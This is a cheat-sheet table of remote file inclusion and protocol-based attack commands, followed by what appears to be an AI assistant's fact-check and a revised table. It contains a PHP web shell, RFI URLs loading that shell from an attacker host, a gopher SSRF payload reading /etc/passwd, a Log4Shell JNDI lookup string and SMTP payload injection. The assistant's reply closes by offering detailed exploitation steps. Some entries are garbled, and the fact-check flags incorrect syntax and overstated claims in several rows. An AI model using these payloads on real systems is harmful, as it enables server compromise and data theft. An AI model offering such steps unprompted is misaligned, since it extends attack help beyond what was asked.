Protocol | Description | Example Exploit Command | Exploitation URL / Command |
---|---|---|---|
HTTP (80/443) | Delivers payload via a web request | echo '<?php system($_GET["cmd"]); ?>' > shell.php sudo python3 -m http.server <LISTEN_PORT> |
http://<TARGET_IP>/index.php?language=http://<ATTACKER_IP>:8081/shell.php&cmd=id |
FTP (21) | Loads a malicious file via FTP | sudo python -m pyftpdlib -p 21 |
http://<TARGET_IP>/index.php?language=ftp://<ATTACKER_IP>/shell.php&cmd=id |
SMB (445) | Exploits file inclusion via SMB share | impacket-smbserver -smb2support share $(pwd) |
http://<TARGET_IP>/index.php?language=\<ATTACKER_IP>\share\shell.php&cmd=whoami |
TFTP (69) | Transfers a malicious script via TFTP | atftp --put shell.php -r shell.php <TARGET_IP> |
http://<TARGET_IP>/index.php?language=tftp://<ATTACKER_IP>/shell.php&cmd=id |
Gopher | Abuses gopher:// to trigger SSRF/RCE | gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd') |
Used for SSRF, sometimes leading to RCE |
LDAP (389) | Injects LDAP queries for RCE | ldapsearch -x -H ldap://<TARGET_IP> -D "cn=admin,dc=example,dc=com" -w password |
Exploits LDAP misconfigurations |
DNS (53) | Transfers payload via DNS query | dig @<TARGET_IP> example.com TXT |
Often used for data exfiltration |
NFS (2049) | Mounts remote dirs to execute payload | mount -t nfs <TARGET_IP>:/exports /mnt/nfs |
Execute payload inside the NFS share |
WebDAV (80/443) | Uploads and executes a web shell | cadaver http://<TARGET_IP>/webdav |
Upload shell: PUT shell.php |
IMAP (143/993) | Injects commands via email attachment | openssl s_client -connect <TARGET_IP>:143 -quiet |
Send payload via IMAP command |
SMTP (25/587) | Sends payload via email headers | swaks --to victim@example.com --from attacker@example.com --data "EHLO example.com\r\nMAIL FROM:<attacker>\r\nRCPT TO:<victim>\r\nDATA\r\n<?php system($_GET['cmd']); ?>\r\n.\r\n" |
Payload sent via email body |
Fact-Check
Description: Delivers payload via a web request.
Example Exploit Command:
echo '' > shell.php (creates a PHP web shell).
sudo python3 -m http.server <LISTEN_PORT> (serves the shell).
Check: Correct. This sets up a simple HTTP server to deliver the malicious file.
Exploitation URL:
http://<TARGET_IP>/index.php?language=http://<ATTACKER_IP>:8081/shell.php&cmd=id
Check: Valid for RFI if the target allows remote file inclusion (e.g., allow_url_include=On in PHP). The cmd=id executes the id command via the shell.
Status: Accurate. Classic RFI example.
Description: Loads a malicious file via FTP.
Example Exploit Command:
sudo python -m pyftpdlib -p 21
Check: Correct. pyftpdlib is a Python FTP server; -p 21 sets it to listen on port 21. Assumes shell.php is in the current directory.
Exploitation URL:
http://<TARGET_IP>/index.php?language=ftp://<ATTACKER_IP>/shell.php&cmd=id
Check: Valid for RFI with FTP support in PHP (ftp:// wrapper enabled). Executes the shell if included.
Status: Accurate. Feasible with RFI vulnerability.
Description: Exploits file inclusion via SMB share.
Example Exploit Command:
impacket-smbserver -smb2support share $(pwd)
Check: Correct. impacket-smbserver sets up an SMB share; -smb2support ensures modern compatibility. Shares the current directory ($(pwd)).
Exploitation URL:
http://<TARGET_IP>/index.php?language=\<ATTACKER_IP>\share\shell.php&cmd=whoami
Check: Valid for Windows targets with SMB inclusion enabled (e.g., file:// or UNC paths). Executes whoami if the shell is included.
Status: Accurate. Works in specific contexts (Windows, permissive configs).
Description: Transfers a malicious script via TFTP.
Example Exploit Command:
atftp --put shell.php -r shell.php <TARGET_IP>
Check: Incorrect syntax. atftp uses --put to upload, but -r shell.php specifies a remote file, and it’s meant to send to <TARGET_IP>. Correct usage would be atftp -p -l shell.php -r shell.php <TARGET_IP>, assuming a TFTP server runs on the target. For an attacker serving the file, a TFTP server like tftpd is needed (e.g., sudo tftpd -L -p 69).
Exploitation URL:
http://<TARGET_IP>/index.php?language=tftp://<ATTACKER_IP>/shell.php&cmd=id
Check: Valid if the target supports tftp:// (rare, requires custom wrappers or misconfigs). Executes id if included.
Status: Mostly Accurate. Command needs correction; concept is sound but rare.
Description: Abuses gopher:// to trigger SSRF/RCE.
Example Exploit Command:
gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd')
Check: Partially correct. This is an SSRF payload targeting MySQL (port 3306), not direct RCE. It’s a URL, not a command to execute locally. A tool like curl would send it: curl "gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd')". RCE depends on further exploitation (e.g., writing a file).
Exploitation URL:
"Used for SSRF, sometimes leading to RCE"
Check: Accurate. Gopher is primarily SSRF; RCE is indirect (e.g., via database or service abuse).
Status: Accurate. Description fits; command is an example payload, not a local command.
Description: Injects LDAP queries for RCE.
Example Exploit Command:
ldapsearch -x -H ldap://<TARGET_IP> -D "cn=admin,dc=example,dc=com" -w password
Check: Correct syntax for querying LDAP, but it’s reconnaissance, not RCE. RCE via LDAP often requires a vulnerable app (e.g., Log4Shell: ${jndi:ldap://<ATTACKER_IP>/a}).
Exploitation URL:
"Exploits LDAP misconfigurations"
Check: Vague but true. RCE depends on app-level vulnerabilities, not LDAP alone.
Status: Partially Accurate. RCE claim is overstated; needs context (e.g., Log4j).
Description: Transfers payload via DNS query.
Example Exploit Command:
dig @<TARGET_IP> example.com TXT
Check: Correct for querying DNS, but it’s not an RCE payload—just a lookup.
Exploitation URL:
"Often used for data exfiltration"
Check: Accurate. DNS isn’t a direct RCE vector; it’s for data leakage.
Status: Inaccurate for RCE. Should clarify it’s exfiltration, not execution.
Description: Mounts remote directories to execute a payload.
Example Exploit Command:
mount -t nfs <TARGET_IP>:/exports /mnt/nfs
Check: Correct. Mounts an NFS share; assumes attacker has a payload in the share and executes it locally or via LFI.
Exploitation URL:
"Execute payload inside the NFS share"
Check: Valid if combined with LFI (e.g., file:///mnt/nfs/shell.php).
Status: Accurate. Feasible with additional steps.
Description: Uploads and executes a web shell via WebDAV.
Example Exploit Command:
cadaver http://<TARGET_IP>/webdav
Check: Correct. cadaver is a WebDAV client; user must then put shell.php manually (not shown).
Exploitation URL:
"Upload shell: PUT shell.php"
Check: Accurate. WebDAV PUT uploads the shell; execution depends on server config.
Status: Accurate. Command assumes follow-up action.
Description: Injects commands via email attachment.
Example Exploit Command:
openssl s_client -connect <TARGET_IP>:143 -quiet
Check: Correct for connecting to IMAP, but no payload is shown. RCE would need a crafted email (e.g., via SMTP first).
Exploitation URL:
"Send payload via IMAP command"
Check: Misleading. IMAP retrieves email; payload must be pre-delivered (e.g., via SMTP).
Status: Partially Accurate. Needs clarification on delivery method.
Description: Sends payload via email headers.
Example Exploit Command:
swaks --to victim@example.com --from attacker@example.com --data "EHLO example.com\r\nMAIL FROM:\r\nRCPT TO:\r\nDATA\r\n\r\n.\r\n"Check: Correct syntax for swaks, but headers don’t execute code—payload must be in the body and executed by a vulnerable app.
Exploitation URL:
"Payload sent via email body"
Check: Accurate; aligns with command’s intent.
Status: Partially Accurate. RCE depends on downstream processing.
Issues Found
TFTP: Command syntax incorrect (atftp usage); needs a TFTP server setup instead.
Gopher: Command is a payload URL, not a local command; RCE is indirect.
LDAP: Overstates RCE; typically requires app-level vuln (e.g., Log4j).
DNS: Not RCE; should be labeled as exfiltration only.
IMAP: Misleading; RCE requires prior payload delivery (e.g., SMTP).
SMTP: RCE overstated; depends on vulnerable email processing.
Revised Table
Here’s a corrected version with clarifications:
Protocol | Description | Example Exploit Command | Exploitation URL / Command |
---|---|---|---|
HTTP (80/443) | Delivers payload via web request | echo '' > shell.php sudo python3 -m http.server 8081 |
http://<TARGET_IP>/index.php?language=http://<ATTACKER_IP>:8081/shell.php&cmd=id |
FTP (21) | Loads malicious file via FTP | sudo python -m pyftpdlib -p 21 | http://<TARGET_IP>/index.php?language=ftp://<ATTACKER_IP>/shell.php&cmd=id |
SMB (445) | Exploits file inclusion via SMB | impacket-smbserver -smb2support share $(pwd) | http://<TARGET_IP>/index.php?language=\<ATTACKER_IP>\share\shell.php&cmd=whoami |
TFTP (69) | Transfers malicious script via TFTP | sudo tftpd -L -p 69 (serve shell.php ) |
http://<TARGET_IP>/index.php?language=tftp://<ATTACKER_IP>/shell.php&cmd=id |
Gopher | SSRF via gopher://, may lead to RCE | curl "gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd')" | SSRF, indirect RCE via backend vuln |
LDAP (389) | RCE via LDAP injection (app vuln) | ldapsearch -x -H ldap://<TARGET_IP> -D "cn=admin,dc=example,dc=com" -w password | Requires app vuln (e.g., Log4j: ${jndi:ldap://<ATTACKER_IP>/a} ) |
DNS (53) | Data exfiltration via DNS query | dig @<TARGET_IP> example.com TXT | Exfiltration, not RCE |
NFS (2049) | Mounts remote dirs for payload | mount -t nfs <TARGET_IP>:/exports /mnt/nfs | Execute payload via LFI (e.g., file:///mnt/nfs/shell.php ) |
WebDAV (80/443) | Uploads web shell via WebDAV | cadaver http://<TARGET_IP>/webdav + put shell.php |
Upload shell: PUT shell.php |
IMAP (143/993) | RCE via email (requires delivery) | openssl s_client -connect <TARGET_IP>:143 -quiet (after SMTP delivery) |
Payload executed by vuln client/server |
SMTP (25/587) | Delivers payload via email | swaks --to victim@example.com --data "" | RCE via vuln email processing |
Final Verdict
Accuracy: Mostly correct; some entries overstate RCE (DNS, LDAP, IMAP, SMTP) or have minor command issues (TFTP, Gopher).
Feasibility: All are plausible with vulnerable targets; clarified dependencies (e.g., app vulns for LDAP).
Corrections: Adjusted descriptions and commands for precision.
The table is solid with minor refinements. Let me know if you want detailed exploitation steps for any protocol!